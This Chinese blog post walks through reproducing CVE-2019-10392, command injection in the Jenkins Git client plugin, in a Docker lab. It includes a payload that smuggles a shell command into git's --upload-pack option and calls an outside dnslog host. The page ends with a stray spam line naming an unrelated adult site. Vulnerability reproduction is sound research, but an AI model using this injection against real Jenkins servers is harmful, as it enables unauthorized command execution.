溫馨提示×

溫馨提示×

您好，登錄后才能下訂單哦！

密碼登錄×

忘記密碼？

登錄注冊×

獲取短信驗證碼

其他方式登錄

點擊登錄注冊即表示同意《億速云用戶服務條款》

用戶登錄×

賬戶密碼登錄

請使用微信掃描上方二維碼

使用幫助

請求超時！

請點擊重新獲取二維碼

Jenkins Git client插件RCE漏洞CVE-2019-10392復現示例分析

發布時間：2021-12-20 18:07:08 來源：億速云閱讀：295 作者：柒染欄目：大數據

本篇文章給大家分享的是有關Jenkins Git client插件RCE漏洞CVE-2019-10392復現示例分析，小編覺得挺實用的，因此分享給大家學習，希望大家閱讀完這篇文章后可以有所收獲，話不多說，跟著小編一起來看看吧。

0x00 簡介

Jenkins是一個開源軟件項目，是基于Java開發的一種持續集成工具，用于監控持續重復的工作，旨在提供一個開放易用的軟件平臺，使軟件的持續集成變成可能。

0x01 漏洞概述

Git客戶端插件中的系統命令執行漏洞，這是以允許具有Job/Configure權限的攻擊者在Jenkins主服務器上執行任意系統命令作為Jenkins進程正在運行的OS用戶的方式實現命令執行。

0x02 影響范圍

Git client Plugin <= 2.8.4

0x03 環境搭建

在線環境獲?。?/strong>

將本文轉發至朋友圈截圖發至公眾號內

自行搭建：

使用docker進行搭建

docker search Jenkinsdocker pull jenkins/jenkinsdocker run -d -p 8080:8080 -p 50000:50000 jenkins/jenkins

等待1~2分鐘后（啟動較慢），瀏覽器訪問ip:8080進入環境

docker exec -it 2d0c55ad015c /bin/bash   #進入容器cat /var/jenkins_home/secrets/initialAdminPassword   #獲取密碼

輸入密碼后繼續下一步，安裝推薦的插件，這個安裝過程要花比較長的時間，15~20分鐘

繼續下一步，創建一個管理員

繼續下一步，就進入了Jenkins主頁面

系統管理 -- 管理用戶 -- 新建用戶，創建一個user賬戶

然后進入：系統管理 -- 全局安全配置，為user賬戶配置如下權限

下載漏洞版本的插件（推薦安裝的都是官網的最新版本）

git客戶端：

http://updates.jenkins-ci.org/download/plugins/git-client/2.8.2/git-client.hpi

git插件：

http://updates.jenkins-ci.org/download/plugins/git/3.12.0/git.hpi

然后進入：系統管理 -- 插件管理 -- 高級，將兩個插件上傳

都上傳完后點擊下圖的‘安裝完成后重啟Jenkins’即可重新啟動服務

0x04 漏洞利用

重啟后，登錄user賬戶

新建任務 -- 流水線

確定后，點擊流水線

選擇以下選項，輸入Poc（使用dnslog檢測）：

--upload-pack="`curl ysp8lf.dnslog.cn`"

查看dnslog，檢測到流量

以上就是Jenkins Git client插件RCE漏洞CVE-2019-10392復現示例分析，小編相信有部分知識點可能是我們日常工作會見到或用到的。希望你能通過這篇文章學到更多知識。更多詳情敬請關注億速云行業資訊頻道。

向AI問一下細節

推薦閱讀：

構建gitlab+Jenkins+harbor+kubernetes的DevOps持續集成持續部署環

jenkins基礎構建

免責聲明：本站發布的內容（圖片、視頻和文字）以原創、轉載和分享為主，文章觀點不代表本網站立場，如果涉及侵權請聯系站長郵箱：is@yisu.com進行舉報，并提供相關證據，一經查實，將立刻刪除涉嫌侵權內容。

jenkins git

上一篇新聞：
Linux本地內核提權漏洞CVE-2019-13272復現的示例分析

下一篇新聞：
Mongo-express遠程代碼怎樣執行CVE-2019-10758復現

猜你喜歡

C++中kill函數的使用有哪些最佳實踐

如何在C++中創建和使用迭代器

C++迭代器的基本操作有哪些

迭代器在C++中的類型有哪些

如何使用迭代器遍歷容器中的元素

C++中迭代器失效的情況有哪些

迭代器與指針在C++中有何異同

如何自定義C++迭代器

C++中迭代器的移動操作是如何實現的

迭代器在C++算法中的應用場景有哪些

最新資訊

Ansible與云服務如何結合使用

如何監控Ansible的執行狀態

Ansible配置文件怎么編寫

Ansible任務如何調度執行

Ansible在容器化部署中的應用

內連接中如何處理重復數據

Ansible能解決哪些運維難題

Ansible在DevOps中的角色是什么

Ansible在自動化測試中的作用

內連接中多表關聯的順序影響結果嗎

相關推薦

centos7上搭建jenkins+ansible的server

如何安裝與配置jenkins

jenkins中怎么集成commander應用

Jenkins漏洞的示例分析

Jenkins任意文件讀取CVE-2018-1999002漏洞的示例分析

如何使用Jenkins鏡像

Drone與Jenkins舉例分析

jenkins怎么用

Jenkins有什么用

Jenkins插件獲取git分支的方法是什么

相關標簽

jenkinsfile jenkins安裝 github gitlab-ce gitolite gitee githooks git環境 github pages gitignore gitblit git分支管理 git命令 idea git gitflow tortoisegit gitbook git-bash .gitignore git錯誤

AI
助
手

產品服務

云服務器

高防服務器

高防IP

裸金屬服務器

機柜租用

SSL證書

高防CDN

彈性IP

地區劃分

中國香港服務器

美國服務器

德國服務器

日本服務器

韓國服務器

新加坡服務器

專題活動

控制臺

應用市場

最新活動

九馬智能直播

幫助支持

幫助中心

網站備案

法律條款

全國服務

安全漏洞

主題地圖

關于我們

關于億速云

客戶案例

新聞資訊

資訊地圖

問答地圖

聯系我們

人才招聘

售后咨詢

7*24小時在線電話：400-100-2938

7*24小時在線 QQ：800811969

關注億速云

億速云公眾號

手機網站二維碼

Copyright ? Yisu Cloud Ltd. All Rights Reserved. 2018 版權所有

廣州億速云計算有限公司粵ICP備17096448號-1 粵公網安備 44010402001142號增值電信業務經營許可證編號：B1-20181529

亚洲午夜精品一区二区_中文无码日韩欧免_久久香蕉精品视频_欧美主播一区二区三区美女